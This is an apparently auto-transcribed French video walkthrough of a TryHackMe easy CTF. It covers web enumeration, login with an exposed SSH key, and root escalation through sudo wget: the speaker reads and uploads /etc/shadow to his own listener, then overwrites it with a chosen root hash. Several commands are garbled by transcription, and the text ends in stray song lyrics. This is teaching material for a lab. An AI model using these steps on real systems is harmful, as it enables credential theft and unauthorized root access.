Bonjour et bienvenue à tous sur cette nouvelle vidéo CTF sur la plateforme TryHackMe. On est sur le CTF WGL CTF, en difficulté easy encore, donc pouvez-vous exfiltrer le flag route. Have fun with this easy box. Amusez-vous avec cette box facile. Ok. J'ai déjà démarré la machine, c'est parti. Je me suis déjà connecté au VPN, voilà, j'ai pris un peu d'avance. On va faire un scan and map 10.10.193.23-a-p-o-n map-results.txt. On lance un scan and map, on va énumérer les ports ouverts et les services. Donc on a deux ports ouverts, le port 22 pour le service SSH, OpenSSH 7.2p2 pour Ubuntu, encore une machine Ubuntu. Vous inquiétez pas, il y a aussi des machines Windows sur TryHackMe. Juste là, moi je prends les CTF comme ça vient, comme ça là, je me dis tiens je vais faire celui-là, je réfléchis pas et à chaque fois on tombe sur des CTF sur Ubuntu. Bon, du coup, et on a le deuxième port ouvert, le port 80 pour le service HTTP, 2.4.18 pour Ubuntu, ok. On va aller faire un tour sur le port 80, je vais ouvrir un nouveau terminal et on va lancer un scan GoBuster dir-u http://dis.10.50-33//directory-list-w.3-medium.txt-o GoBuster results.txt. Bon, c'était assez rapide. Déjà, on a la page sitemap. La page sitemap, généralement, ça répertorie les différentes pages du site web. On va aller voir avec notre navigateur web pendant que le scan GoBuster se fait. Vous voyez que les CTF, c'est souvent à peu près le même schéma. On commence par un scan and map, ensuite énumération web, et ensuite par le site web. Soit on trouve ce qu'il faut pour se connecter en SSH ou autre, soit on exploite une vulnérabilité pour avoir un reverse shell, ça dépend. Mais c'est très souvent ça pour les CTF de niveau facile. Après, il y a des CTF de niveau moyen que j'avais fait qui se passent vraiment très différemment. Bon, vous verrez quand on les fera. De toute façon, je vais essayer de faire tous les CTF de la plateforme si je peux. De toute façon, au bout d'un moment, on y arrivera. Donc 10.10.193.23. Je vais juste aller voir s'il y a le fichier robots.txt. Il n'y a pas, ok, bon, c'est juste pour voir. Donc sitemap, unapp template. Ah, ok, non. Ça ne redirige pas vers sitemap. Enfin, vers la sitemap, vers la liste des pages. Par contre, on a un site unapp. Ouah, ça rame. Je vous ai dit, je sais pas ce qu'il y a, mais sur ma machine virtuelle, ça rame à mort. Quand il y a des trucs un peu, des animations et tout, j'ai l'impression que tout ce qui est graphique, tout ce qui demande des ressources graphiques, ça rame à mort. Pourtant, j'ai mis le max de mémoire vidéo que je pouvais. J'ai mis 256 mégaoctets, c'est pas beaucoup d'ailleurs, mais je peux pas mettre plus. Attendez, c'est moi ou là il y a déjà Dave Miller, enter your email, pricing, ok. On va voir si sur GoBuster on a trouvé d'autres choses, toujours pas. Est-ce qu'on a par exemple une page, oh ça rame à mort, une page admin peut-être? Non, une page login peut-être? Non plus. Là-dessus il y a quoi? Ah d'accord, c'est la même chose en fait, c'est ok. Je vais voir déjà unapp, peut-être qu'il y a un exploit qui existe pour ça. Je vais voir dans le... Oh, ça rame de ouf. Je vais voir dans le code source s'il n'y a pas quelque chose d'intéressant. Dans aide peut-être, dans les unapp template. Encore, il y a marqué unapp. Je pense qu'il va falloir chercher sur exploitdb. Dans la console, il n'y a rien. Dans la console, il y a quoi? Rien d'intéressant. JS, il y a quoi comme fichier JS? Main.js, il y a quoi là-dedans? Pas l'air d'avoir quoi que ce soit d'intéressant. Écoutez, on va voir s'il y a un exploit qui existe pour unapp. Je sais pas ce que c'est unapp, on va chercher. On va aller sur exploit-db et on va taper unapp. Il n'y a rien. Ok, peut-être si je cherche unapp sur Google, est-ce que ça... peut-être unapp exploit. Template CMS 2.1.1. Template CMS 2.1.1 multiple vulnerabilities. Cross-site scripting, cross-site request forgery, ok. Slash admin, ouais mais on n'a pas de page slash admin. Donc ouais non c'est pas... je pense pas que ce soit... Est-ce qu'on a quelque chose là sur GoBuster? Il n'y a pas l'air. Je sais quoi, je vais stopper le scan. Et on va relancer le scan, mais à partir de sitemap / voilà, et on va relancer le scan. On va voir si on trouve des choses plus intéressantes. Et je vais chercher en attendant à côté s'il n'y a pas, parce que ça il me semble que c'est pas une version très récente Apache. Je vais voir s'il n'y a pas un exploit pour la version 2.4.18 d'Apache. Apache 2.4.18, non. Apache, tiens, ça faudra voir. Alors j'ai trouvé un petit bout d'information, je sais même pas si ça va nous être utile. Ici j'ai trouvé un commentaire HTML dans le code source. J'ai regardé avec Burp Suite parce que je pensais qu'il y aurait quelque chose dans les entêtes et tout, mais non. Mais par contre dans le contenu de la page j'ai trouvé Jesse, don't forget to update, moi une faute, mais to update the website. Jesse pense à mettre à jour le site web. Donc on a peut-être un nom d'utilisateur, peut-être, c'est même pas sûr, mais peut-être Jesse. Et surtout
coup, on sait qu'il y a quelque chose qui n'est pas à jour sur le site web. Donc, ce sera probablement un exploit dû à une version de quelque chose pas à jour. Mais le problème, c'est quoi? Je sais pas. Pour Apache 2.4.18, j'ai pas trouvé d'exploit. Après, j'ai peut-être pas assez cherché, mais ça m'agace de pas trouver comme ça. Vraiment. Bon, écoutez, je vais essayer. Là, ça fait plein de trucs que j'essaye. Je bloque. On va essayer qu'une autre word list, peut-être. Parce que là, j'ai cherché d'autres choses sur le site et tout. Je trouve vraiment rien d'exploitable. Donc, on va voir si on peut pas trouver quelque chose avec une autre word list. Seclist, discovery, web content, common.txt. HT access, HT password. C'est des trucs que j'ai déjà testé à la main mais qui n'ont pas marché puisqu'on reçoit un code 403, donc non autorisé. Si j'essaye dans sitemap, là on n'a rien trouvé. Sitemap slash... Ah mince, slash.ssh, qu'est-ce que c'est que ça? Je vais faire mes burp suite. Ouais, ça sert à rien, burp suite, allez, dégage. On va aller voir ça à la main. 10.10.193.23 slash sitemap slash .ssh, c'était ça. Enfin, on a une clé privée. On a une clé privée et en plus on a peut-être le nom d'utilisateur. À la limite, on pourra essayer de le brute force si on en a pas, mais quoique, puisque je sais pas comment brute force avec ça. Mais tout à l'heure, on avait un nom d'utilisateur Jessie. Je sais pas si vous vous rappelez. Qu'on a vu dans le code source de la page index sur le port 80. J'avais même lancé un brute force, mais ça sert strictement à rien parce que ça, voilà, ça tourne depuis je sais pas combien de temps, ça a toujours rien trouvé. D'ailleurs, j'arrive pas à l'annuler. Exit, voilà. Donc, je vais faire nano id RSA. Donc voilà, j'ai copié la clé privée dans ce fichier. Bon, je vais le renommer parce que je l'ai mal écrit, IDRSA. Et je vais changer les permissions pour qu'on puisse utiliser la clé. N'oubliez pas, hein, quand vous créez un fichier qui contient une clé privée SSH, il faut bien mettre les permissions 600. C'est-à-dire que, en gros, vous donnez les permissions copropriétaires et à personne d'autre sur ce fichier. Vous êtes obligé, sinon SSH va pas accepter votre clé privée en fait. Donc SSH, Jessie, du coup, arrobase 10.10.193.3-i IDRSA, est-ce que ça marche? Alléluia, j'en pouvais plus. Je sais pas depuis combien de temps je cherche, mais j'en pouvais plus. C'était tout con, fallait juste utiliser une autre wordlist. Comme quoi, vous voyez, suffit d'utiliser une wordlist qui contient pas le truc qu'il faut et c'est mort. Est-ce qu'on a pas l'air d'avoir le flag? On a par contre ça, ce qui veut dire que Jessie a peut-être des droits sudo. On va aller voir sur son bureau s'il n'y a pas le flag. ls, peut-être ls-là. Non, attendez, je vais faire find.slash. Oula. Ah ben dans document il y a le user flag, bah, parfait. 4 user flag. On a le flag user, enfin, pouf, collé. Bon ben quand vous trouvez vraiment rien, faut essayer de changer de wordlist ou autre. Parce que ouais, je vous dis, je cherchais pour la version d'Apache, la version de tout. J'avais même vu des scripts JavaScript, je cherchais s'il n'y avait pas des exploits pour ces scripts. Enfin, je cherchais tout. Et en fait, il suffisait de changer de wordlist. Donc je vous mettrai dans la description, j'ai peut-être oublié dans un CTF précédent d'ailleurs, mais je vous mettrai dans la description le lien des wordlist seclist, parce que c'est ce qui m'a servi là du coup. Je vais faire sudo-l, on a peut-être des droits sudo. Le seul truc qu'on peut lancer avec sudo, qu'on peut exécuter avec sudo en tant que root sans mot de passe, c'est wget. Donc je vais chercher sur exploitdb, pardon, sur gtfobins, rien à voir. gtfobins, on va chercher wget, on va voir si on peut avoir un shell avec wget, tiens. Alors ils nous disent use askpass, ça exécute un script. On pourrait lire directement le flag root, mais je vais voir si on peut pas carrément être root, ce sera encore mieux. 4/etc/passwd. Déjà il y a rien d'intéressant ici. On va essayer de lire le fichier. Oh, peut-être qu'il y a une clé. Attendez, peut-être qu'on pourrait trouver la clé privée. Alors on va faire wget sudo sudo wget-i, donc le fichier qu'on veut lire, -i, ouais, et /etc/shadow. On a le hash du mot de passe de Jessie, on pourrait peut-être le craquer, puisque si on a son mot de passe, on peut après exécuter du coup un shell en tant que root. Ouais. Est-ce qu'on peut pas choper la clé privée peut-être /root /.ssh/id-rsa peut-être? Trouve pas. Est-ce qu'on peut écrire? Parce que je vois qu'on peut écrire, vous voyez, sur GTFOBIT, on peut écrire dans des fichiers. Genre si je peux pas écrire sur... Déjà je vais voir s'il y a une clé publique. Je vais voir si je peux écrire ma clé publique. On va essayer un truc. Je vais générer ssh-keygen des clés -f idrsa. Non, pas overwrite. Putain, heureusement qu'il me le demande. idrsa-root, pas de passphrase. Voilà, on a généré une paire de clés SSH. On va lire la clé publique. idrsa root.pub, je vais la copier, voilà. Et on va essayer d'écrire ça dans le fichier autorisé de key de root et voir si on peut se connecter en SSH après. D'abord, je vais faire nano idrsa.pub ici, voilà. CTRL-SHIFT-V, ça me l'a bien collé. CTRL-S, CTRL-X, ouais, je sauvegarde. Et du coup, là, maintenant, je vais faire sudo wget-i
i. Donc là, il va lire le fichier idrsa.pub et je vais faire -o /root/.ssh /toryz-keys dans such file or directory. Mince, il veut pas le créer. Je peux peut-être... on peut récupérer le flag root, mais genre on peut juste faire ça si on veut, je pense. /root.txt, vous voyez, je pense qu'on peut faire ça. Ah non, même pas. Pourquoi je peux pas juste avoir un shell? Première fois que je galère autant sur un CTF de niveau easy, je pense. Alors on va essayer quelque chose. J'ai peut-être une idée. On va ouvrir un petit serveur web ici. Python 3-m http://serveur80. Pardon. 8080. Voilà. Et là, je vais essayer d'upload le fichier /etc/shadow. D'accord. Donc je vais faire wget-post-file égale http://10.14.32.60.2.8080/. Ok, non, excusez-moi, je suis juste /etc/shadow, je suis juste fatigué, excusez-moi. Donc wget, et on envoie le fichier /etc/shadow à mon serveur web, permission denied. Ah, j'ai oublié sudo, pardon, sudo, error unsupported method post. Mince. Je viens de choper un code assez basique d'un serveur web qui accepte les requêtes post en Python. Je l'ai téléchargé sur GitHub, on va voir si ça fonctionne. De toute façon, si ça marche, je vous mettrai le lien en description. Donc maintenant, si je fais python 3 serveur.py, et il me l'ouvre sur quel port par défaut? Ah, normalement, on est censé préciser le port. Clear. Donc je vais mettre 8080. Normalement, il m'a ouvert un serveur web... Ah, et on a bien reçu le fichier /etc/shadow. Donc je vais tout copier, CTRL-C. Maintenant, on va faire nano shadow.back parce que c'est comme une backup. Voilà, je sauvegarde. Et donc là, on a le fichier shadow. Maintenant, ce que j'ai envie de faire, je vais le copy shadow.back shadow. Je vais créer un hash de mot de passe. Donc je vais faire mkpasswd. Je vais générer un mot de passe, enfin un hash de mot de passe qu'on va mettre dans le fichier shadow pour root. Donc on va littéralement changer le mot de passe de root. Et on va renvoyer ce fichier shadow sur la cible. Et si on y arrive, on pourra se connecter en tant que root, puisqu'on aura choisi le mot de passe de root indirectement, en changeant son hash du coup. Donc méthode égale SHA-512. Il y a plusieurs méthodes qui existent, moi je dis celle-là. --stdin. Donc là le mot de passe on va mettre root. Voilà. Et donc là on a le hash qui a été généré, on va le copier. On va modifier le fichier shadow, et à la place de ça ici, CTRL-SHIFT-V, voilà. On a collé le hash à la place du point d'exclamation, CTRL-S, CTRL-X, ou on aurait pu le faire pour l'utilisateur Jessie, mais bon, on va essayer comme ça. Si ça marche pas, on essaiera avec Jessie. Et donc maintenant, je vais faire python 3-m http://serveur8080. Et maintenant, on va retélécharger le fichier qui a été modifié sur la cible. Donc on va faire sudo wget http://10.14.32.60.2.8080/shadow et on va enregistrer ça dans donc -o majuscule /etc/shadow. J'ai mal tapé, c'est pas grave. Shadow. Ok. Et si je fais sur root, on a réussi. Yes, on est root. Ok. Pardon. Je m'excite trop, je fais n'importe quoi, j'appuie partout sur mon clavier comme un bourrin. cd/root, ls, on a réussi, ls-la, on est root, yes, on a réussi à être root, ok. J'ai galéré sur ce CTF1, malgré qu'il était de difficulté facile, comme quoi, on a le flag root enfin, j'en ai mis du temps. Et vous voyez, quand on galère et qu'on a cette satisfaction, même après avoir galéré longtemps, de enfin trouver la solution, j'adore ça. Dans le CTF, c'est ce que j'adore. Donc voilà, on a terminé ce CTF de difficulté facile. Pourtant, j'ai galéré. Mais bon, voilà, c'était tout pour ce CTF de difficulté facile. J'espère qu'il vous aura plu. Faudra que je fasse le compte rendu écrit en anglais. Il sera dans la description, au moment où la vidéo sera en ligne. Vous aurez aussi, comme d'hab, le lien de la room, qui est une room gratuite, il me semble. Oui, c'est ça. De toute façon, c'est marqué dans la description à chaque fois à côté du lien. Je vous mettrai aussi le sommaire, comme d'habitude, les liens utiles et les docs en description, donc, qui ont pu me servir dans la vidéo par exemple, qui pourront peut-être vous servir vous pour comprendre certaines choses ou pour vous aider pendant le CTF si vous bloquez. J'espère que ça vous aura plu. Si c'est le cas, n'hésitez pas à me le dire en commentaire, à lâcher un like si vous avez aimé la vidéo, et si vous voulez être notifié des prochaines vidéos qui sortent, n'hésitez pas à vous abonner, et moi je vous dis à la prochaine. I'm taking 6 shots, yeah, straight to the face. And I wanna get lost, I'm sick of this place. Don't know how to stop when I'm feeling this way. So I'm taking